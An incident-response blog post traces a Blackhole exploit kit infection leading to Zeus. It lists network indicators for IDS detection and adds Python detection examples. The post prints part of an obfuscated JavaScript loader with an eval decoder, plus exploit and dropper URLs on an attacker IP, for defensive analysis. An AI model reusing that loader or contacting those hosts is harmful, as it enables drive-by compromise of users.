By Grant Warkins, Advisory Practice Consultant, RSA/NetWitness Incident Response
Based on the last few Incident Response engagements I’ve participated in, the most common question I’ve heard is “what are the common indicators you are using to find evil?” This is not a question that has a simple answer. In this blog post, I’ll examine a Blackhole exploit kit session and discuss the various network indicators that analysts should be looking for when identifying host exploitation and associated binaries. The intent here is not to pick apart malware or de-obfuscate JavaScript, but to show how asking simple questions about your network traffic can reveal the bad stuff being missed by your other security products.
For this exercise, I’m utilizing a packet capture (PCAP) associated with a zero day exploit used by the Blackhole exploit kit 2.0. This PCAP can be found on the Contagio malware repository managed by Mila Parkour[1].
This scenario begins with a phishing email attempting to spoof correspondence with a popular data processing outsourcing provider. A user that clicks on the link with Firefox as the default browser will initiate the following HTTP GET request:
Figure 1: Initial HTTP GET Request
The response is a common indicator of a Blackhole exploit kit landing page, as noted by the text “WAIT PLEASE Loading…”, followed by JavaScript pointing to links associated with active redirectors.
Figure 2: Example of Blackhole Exploit Kit Landing Page
NOTE: Be careful when building IDS rules on the HTML text above, because the false-positive rate is high. A more distinctive trait is that the folder names in the URL path consist of 8 random alphanumeric characters.
Figure 3: Sample GET Request From Landing Page
Both URLs point to the same redirector containing the exploits to be served to the host:
Figure 4: Redirector Points to Host Containing Exploits
NOTE: The ETag associated with this file was also found in PCAPs associated with other redirectors and could provide a useful indicator to be used in an IDS signature.
As shown in the GET request below, a common red flag for analysts to review is an HTTP GET request directly to an IP address. While there are occasions where this is normal, it’s a good practice to verify that a direct HTTP request to an IP is benign.
Figure 5: GET Request Sent to Server Containing Exploit Code
Accessing this page dynamically generates heavily obfuscated JavaScript containing a URL pointing to PDF and Java exploits (Decoding this JavaScript will be discussed in a future blog post).
```
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Content-Length: 27513

<html><body><applet archive="http://69.194.193.34/data/java.jar" code="fbeatbea.fbeatbed"><param value="N0b0909041f3131343e3c373e2b3c373e083c
***(removed code)***
^44303l3p3h*3r45441c3h&3q3g3b423h_3g3l423h3f@441g201k1k%1k1d23"></u><script>
a=document[g]("google")[gg]("data");
a=a.replace(/[^0-9a-z]/g,"");
s="";
for(i=0;i<a.length;i+=2){
if(020==0x10)s+=String.fromCharCode(parseInt(a.substr(i,2),28));}
try{(alert+"")()}catch(adgsdg){eval(s);}
</script></body></html>
```
Figure 6: Sample of Obfuscated JavaScript and Associated Jar File
Two of the links generated point to an unsuccessful PDF exploit for CVE-2010-0188:
- 69.194.193.34/links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07.
- 69.194.193.34/systems-links_warns.php?nfezhok=0906343704&sbipbq=3dzz7ecg=35353306040934370b06&qara=0b0007000400040b07. This second request appears to be a retry after the first attempt was unsuccessful.
The PDFs contain the shellcode shown in Figure 7, which embeds the URL for the downloader:
Figure 7: Exploit Code From Malicious PDF
The third link accessed is associated with a Java JAR file that contained exploit code for CVE-2012-1723 and CVE-2012-4681 (Additional review of the JAR file will also be covered in a separate blog). The successful exploit causes the host to download the dropper “calc.exe” from 69.194.193.34/links/systems-links_warns.php?tf=0206360203&le=35353306040934370b06&i=02&jy=b&fg=h.
Figure 8: GET Request for Downloader
NOTE: Another red flag for network analysis is shown above: Java/1.7.0_06 is referenced in the User-Agent field. Outside of Java updates, it is not normal to see this, and the associated sessions should be reviewed. The response contains additional red flags that should also be considered:
Figure 9: Response to HTTP GET Request for the Downloader
- Content-Type does not match what was in the Accept field of the GET request.
- Content-Disposition with a filename. This forces the save-as feature to download the file under that name and often indicates an automated download.
With the downloader now on the host and executed, we see it check-in:
Figure 10: Encrypted HTTP POST From Downloader
NOTE: The above HTTP POST contains several red flags:
- The User-Agent string contains Windows 98.
- HTTP POST direct to an IP.
- HTTP POST without an associated referrer field.
- HTTP POST header contains HTTP/1.0. This is not normally seen associated with modern browsers or tools.
Figure 11: Downloader C2 Response
With the check-in complete, the downloader pulls down the Zeus Trojan:
Figure 12: HTTP GET Request for Zeus
Figure 13: Response to HTTP GET Request for Zeus
Finally, we see random UDP data being sent to seemingly random IP addresses, which is a good indicator that the Zeus version downloaded was P2P capable, without having to statically analyze it.
```
ip.dst = 79.14.79.134
ip.proto = 17
udp.srcport = 18707
udp.dstport = 24815
service = 0
streams = 1
packets = 1
lifetime = 0
country.dst = Italy
city.dst = Verona
latdec.dst = 45.45
longdec.dst = 11
org.dst = Telecom Italia
domain.dst = telecomitalia.it
```
Figure 14: Sample Zeus P2P Packet Metadata
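An added example, not from the post, that applies the P2P observation above to flow metadata in the key = value form of Figure 14. The records are constructed (only the first destination and port pair comes from the figure), the ip.src field is assumed since the figure shows only the destination side, and the thresholds are my own.

```python
import re
from collections import defaultdict

# Constructed flow records in the "key = value" style of Figure 14 (not from the PCAP);
# ip.src is an assumed field, since the figure shows only the destination side.
FLOW_META = """\
ip.src = 10.0.0.5 ip.dst = 79.14.79.134 ip.proto = 17 udp.srcport = 18707 udp.dstport = 24815 packets = 1
ip.src = 10.0.0.5 ip.dst = 203.0.113.77 ip.proto = 17 udp.srcport = 18707 udp.dstport = 13902 packets = 1
ip.src = 10.0.0.5 ip.dst = 198.51.100.9 ip.proto = 17 udp.srcport = 18707 udp.dstport = 31044 packets = 1
ip.src = 10.0.0.5 ip.dst = 192.0.2.140 ip.proto = 17 udp.srcport = 18707 udp.dstport = 27651 packets = 1
ip.src = 10.0.0.5 ip.dst = 198.51.100.201 ip.proto = 17 udp.srcport = 18707 udp.dstport = 19983 packets = 2
ip.src = 10.0.0.5 ip.dst = 203.0.113.18 ip.proto = 17 udp.srcport = 18707 udp.dstport = 22119 packets = 1
ip.src = 10.0.0.9 ip.dst = 10.0.0.1 ip.proto = 17 udp.srcport = 51022 udp.dstport = 53 packets = 2
ip.src = 10.0.0.9 ip.dst = 10.0.0.1 ip.proto = 17 udp.srcport = 51023 udp.dstport = 53 packets = 2
ip.src = 10.0.0.9 ip.dst = 10.0.0.2 ip.proto = 17 udp.srcport = 51024 udp.dstport = 53 packets = 2
"""
KV = re.compile(r"([\w.]+) = (\S+)")

def parse_flows(text):
    """One dict of field -> value per non-empty metadata line."""
    return [dict(KV.findall(line)) for line in text.splitlines() if line.strip()]

def p2p_suspects(flows, min_peers=5, min_ratio=0.8, min_port=1024):
    """Per source host: True when its UDP traffic fans out to many peers on high,
    mostly distinct ports as one-packet exchanges, the pattern the post ties to P2P Zeus."""
    by_src = defaultdict(list)
    for f in flows:
        if f.get("ip.proto") == "17":          # UDP only
            by_src[f["ip.src"]].append(f)
    verdicts = {}
    for src, fl in by_src.items():
        peers = {f["ip.dst"] for f in fl}
        ports = [int(f["udp.dstport"]) for f in fl]
        single_pkt = sum(f.get("packets") == "1" for f in fl) / len(fl)
        port_spread = len(set(ports)) / len(fl)
        verdicts[src] = (len(peers) >= min_peers and single_pkt >= min_ratio
                         and port_spread >= min_ratio and min(ports) >= min_port)
    return verdicts
```

The DNS-only host is left alone because it talks to few peers on a well-known port; the other host trips every threshold.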
Figure 15: Sample P2P Data Sent By Zeus
So, just from quickly analyzing the Blackhole exploit kit in action, we’ve identified several key network indicators that analysts should keep an eye out for. These indicators can easily be automated by your tool of choice, be it an IDS or a NetWitness Decoder, and can be grouped to reduce the number of false-positive hits. Additionally, products such as NetWitness are migrating to a unified analytics approach that automates the implementation of well-known indicators as they become known within the malware intelligence community. The table below summarizes the network indicators we’ve identified:
| Network Indicator | False Positive Rate |
|---|---|
| HTTP GET requests with folder names containing 8 random alphanumeric characters | High |
| HTTP response containing `<h1>WAIT PLEASE</h1><h3>Loading...</h3>` | High |
| Signature based on a specific HTTP ETag | Low |
| HTTP GET or POST direct to an IP | Moderate |
| `client contains java && (filetype = 'windows executable')` | Low |
| HTTP Content-Disposition with filename | Moderate |
| User-Agent containing deprecated operating systems or browsers | Low |
| HTTP POST or GET without a referrer field | Low |
| HTTP POST referencing HTTP/1.0 | Moderate |

Figure 16: Summary of Common Network Indicators
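The indicators in the table above turned into detection logic, as an added example (my code, not the post's or NetWitness's). It scores constructed HTTP transactions modelled on Figures 8 to 10; the weights, the list of deprecated platforms and the header values are assumptions, and an "MZ" body prefix stands in for the filetype = 'windows executable' check.

```python
import re
# Indicator names follow the post's summary table; weights invert its FP rating (low=3, moderate=2, high=1), an assumption here.
WEIGHTS = {"random_dir": 1, "direct_to_ip": 2, "no_referer": 3, "post_http10": 2, "deprecated_ua": 3,
           "disposition_filename": 2, "java_fetching_exe": 3, "accept_mismatch": 2}
RANDOM_DIR = re.compile(r"/[0-9a-z]{8}(?=/)", re.I)           # folder name of 8 alphanumerics
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")  # Host header is a bare IPv4 (+port)
OLD_PLATFORMS = ("Windows 98", "Windows 95", "Windows NT 4.0", "MSIE 5.")  # assumed list

def accept_allows(accept, ctype):
    """True if the response Content-Type is covered by the request's Accept header."""
    media = ctype.split(";")[0].strip().lower()
    for item in accept.split(","):
        pat = item.split(";")[0].strip().lower()
        if pat in ("*/*", "*") or pat == media or (pat.endswith("/*") and media.startswith(pat[:-1])):
            return True
    return False

def find_indicators(tx):
    """Names of the post's indicators that fire for one transaction dict."""
    req, resp = tx["req"], tx.get("resp", {})
    ua, ctype = req.get("User-Agent", ""), resp.get("Content-Type", "")
    checks = [
        ("random_dir", RANDOM_DIR.search(tx["path"].split("?")[0])),
        ("direct_to_ip", IP_HOST.match(tx["host"])),
        ("no_referer", "Referer" not in req),
        ("post_http10", tx["method"] == "POST" and tx["version"] == "HTTP/1.0"),
        ("deprecated_ua", any(p in ua for p in OLD_PLATFORMS)),
        ("disposition_filename", "filename" in resp.get("Content-Disposition", "").lower()),
        ("java_fetching_exe", "java" in ua.lower() and resp.get("body", b"")[:2] == b"MZ"),
        ("accept_mismatch", ctype and "Accept" in req and not accept_allows(req["Accept"], ctype)),
    ]
    return [name for name, fired in checks if fired]

def score(tx):   # stacking weighted indicators is how the post suggests cutting false positives
    return sum(WEIGHTS[h] for h in find_indicators(tx))

# Constructed transactions modelled on Figures 8 to 10; header values are illustrative, not the PCAP's.
SAMPLES = {
    "java_download": {"method": "GET", "version": "HTTP/1.1", "host": "69.194.193.34", "path": "/links/systems-links_warns.php",
        "req": {"User-Agent": "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06", "Accept": "text/html, image/gif"},
        "resp": {"Content-Type": "application/x-msdownload",
                 "Content-Disposition": "attachment; filename=calc.exe", "body": b"MZ\x90\x00"}},
    "checkin": {"method": "POST", "version": "HTTP/1.0", "host": "69.194.193.34", "path": "/",
        "req": {"User-Agent": "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)", "Accept": "*/*"},
        "resp": {"Content-Type": "text/html"}},
    "benign": {"method": "GET", "version": "HTTP/1.1", "host": "www.example.com", "path": "/news/",
        "req": {"User-Agent": "Mozilla/5.0 (Windows NT 6.1) Firefox/15.0", "Accept": "text/html,*/*;q=0.8",
                "Referer": "https://www.example.com/"}, "resp": {"Content-Type": "text/html; charset=utf-8"}},
}
```

Single hits such as a missing Referer are common in normal traffic; the score only climbs when several of the post's indicators coincide in one session, which is the grouping the text recommends.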
[1] http://contagiodump.blogspot.com/2012/09/cve-2012-4681-samples-original-apt-and.html